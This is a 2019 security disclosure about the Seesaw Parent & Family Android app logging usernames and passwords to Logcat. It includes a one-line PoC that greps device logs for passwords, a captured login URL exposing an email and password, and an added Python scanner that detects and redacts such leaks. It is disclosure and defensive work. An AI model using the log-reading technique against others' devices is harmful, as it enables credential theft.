friendlyjlee

Security Vulnerability in Seesaw Parent & Family app

Oct 7th, 2019
# Title: Seesaw Parent & Family app - Logging Sensitive Information
# Application: Seesaw Parent & Family
# Version: 6.2.5
# Software Link: https://play.google.com/store/apps/details?id=seesaw.shadowpuppet.co.seesaw
# Company: Seesaw
# Installs: 1,000,000+
# Impact: An attacker who can read the device log can obtain the username and password of a Seesaw Family user.
# Category: Mobile Apps
# Tested on: Android 9

---Description---
Seesaw Family, a popular education app with more than 1 million installs, writes the username and password to Logcat. An attacker can therefore obtain the app's username and password simply by reading Logcat. This is especially serious on old Android versions prior to Android Jelly Bean, where any installed app can read Logcat without any permission.

---Vendor feedback---
After the report, the vendor fixed the problem quickly and released a new version.

---PoC---
1. Try to log in with the Android app.
- Open the login UI.
- Enter credentials. Fake credentials are enough to reproduce the issue.

2. Search the log for the password:
$ adb logcat | grep 'password'

D Retrofit: ---> HTTP POST https://app.seesaw.me/api/auth/login?classes=1&email=jaeho.lee%40rice.edu&password=MyPasswordIsHere&role=parent&_bundle=me.see-saw.android_parent&_build=1584703&_model=GOOGLE+Android+SDK+built+for+x86&_install_id=732b4c9e-dbf0-4ecb-ad31-188bf4e51901&_tz_offset=0

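The logged request above shows the root cause plainly: the HTTP client's debug logging prints the full request URL, and the login request carries the e-mail and password as query-string parameters. A defender reviewing an app build (or a CI pipeline checking release logs) wants a quick way to catch this class of leak. The following scanner is an added example, not part of the original report or of Seesaw's code; it reads logcat-style lines, reports which credential-like query parameters appear in any URL, and returns a redacted copy of the line. The sample log lines, the host app.example.invalid and the parameter values are constructed for the example; the parameter-name list is an assumed starting point that a reviewer would extend for their own app.

```python
import re
import sys

# Query-string parameter names that should never appear in a log line.
# (Assumed list for this example; extend it for the app under review.)
SENSITIVE_PARAMS = ("password", "passwd", "pwd", "secret", "token", "access_token", "email")

# Matches "?password=value" or "&password=value" up to the next '&', whitespace or quote.
_SENSITIVE_RE = re.compile(
    r"(?i)([?&](?:" + "|".join(map(re.escape, SENSITIVE_PARAMS)) + r")=)[^&\s\"']*"
)
# Rough URL matcher: good enough for URLs printed by HTTP-client debug logging.
_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def find_leaked_params(line):
    """Return the sensitive parameter names found in any URL on a log line, in order."""
    found = []
    for url in _URL_RE.findall(line):
        for m in _SENSITIVE_RE.finditer(url):
            # group(1) is e.g. "&password="; strip the separator and the '='.
            found.append(m.group(1)[1:-1].lower())
    return found


def redact_line(line):
    """Replace the value of every sensitive query parameter with [REDACTED]."""
    return _SENSITIVE_RE.sub(r"\g<1>[REDACTED]", line)


def scan_logcat(text):
    """Return (line_number, leaked_param_names, redacted_line) for each leaking line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        params = find_leaked_params(line)
        if params:
            findings.append((n, params, redact_line(line)))
    return findings


# Constructed sample logcat output modelled on the PoC line in the report.
SAMPLE_LOGCAT = """\
D Retrofit: ---> HTTP POST https://app.example.invalid/api/auth/login?classes=1&email=parent%40example.com&password=NotARealPassword&role=parent&_tz_offset=0
D Retrofit: <--- HTTP 200 https://app.example.invalid/api/auth/login (412ms)
I ActivityManager: Displayed me.example.parent/.MainActivity: +1s203ms
D OkHttp: ---> GET https://app.example.invalid/api/items?access_token=ConstructedToken123&page=2
"""


if __name__ == "__main__":
    # Usage: adb logcat | python3 scan_logcat.py   (falls back to the sample when stdin is a TTY)
    text = SAMPLE_LOGCAT if sys.stdin.isatty() else sys.stdin.read()
    for n, params, redacted in scan_logcat(text):
        print(f"line {n}: leaks {', '.join(params)}")
        print(f"  {redacted}")
```

The scanner only ever prints the redacted form, so a finding can be pasted into a bug report without reproducing the leak. Note that a URL like the one in the PoC leaks in more places than Logcat: query strings are also retained by web-server access logs, proxies and browser history, so the durable fix is to move credentials into the request body and to disable or redact client debug logging in release builds.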
---Reporter---
Jaeho Lee (Jaeho.Lee@rice.edu)
Rice Computer Security Lab
Rice University